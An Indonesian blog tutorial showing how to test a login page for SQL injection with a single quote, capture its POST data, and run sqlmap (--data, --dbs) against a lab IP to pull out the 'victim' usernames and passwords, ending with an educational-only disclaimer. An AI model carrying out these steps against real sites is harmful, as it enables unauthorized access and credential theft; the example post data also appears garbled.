SQL Injection pada Halaman Login

SQL Injection pada Halaman Login - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul SQL Injection pada Halaman Login, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.

Sebenarnya ini teknik lama namun saya share barangkali ada yang belum tau. SQL Injection sendiri bisa dilakukan di halaman login pada target yang vuln terhadap sqli post data.

Saat kalian megakses halaman login sebuah situs coba masukkan petik satu ( ‘ ) di kolom username atau password nya. Nah jika kalian mendapat error seperti ss diatas maka sqli bisa dilakukan.

Kita gunakan addons HTTP Headers pada firefox untuk meng-capture post data yang terdapat pada halaman login tersebut.

Seperti ss diatas,

Vuln terdapat pada :

http://192.168.48.143/checklogin.php

Dengan post data sebagai berikut :

myusername=linuxsecmypassword=%27Submit=Login

Disini saya coba melakukan injeksi dengan SQLmap.

Command nya sebagai berikut :

sqlmap -u url --data=post data --dbs

Contoh :

sqlmap -u http://192.168.48.143/checklogin.php --data=myusername=linuxsecmypassword=%27Submit=Login --dbs

Dan biarkan SQLmap melakukan injeksi otomatis.

Selanjutnya tinggal masukkan command basic SQLmap sampai kita mendapat username dan password victim.

Oke sekian tutor singkat kali ini, semoga bermanfaat.

Sumber http://noob1t4.blogspot.com/

Sekian Artikel SQL Injection pada Halaman Login.

Terima kasih telah membaca artikel SQL Injection pada Halaman Login, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.

Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini

Share this post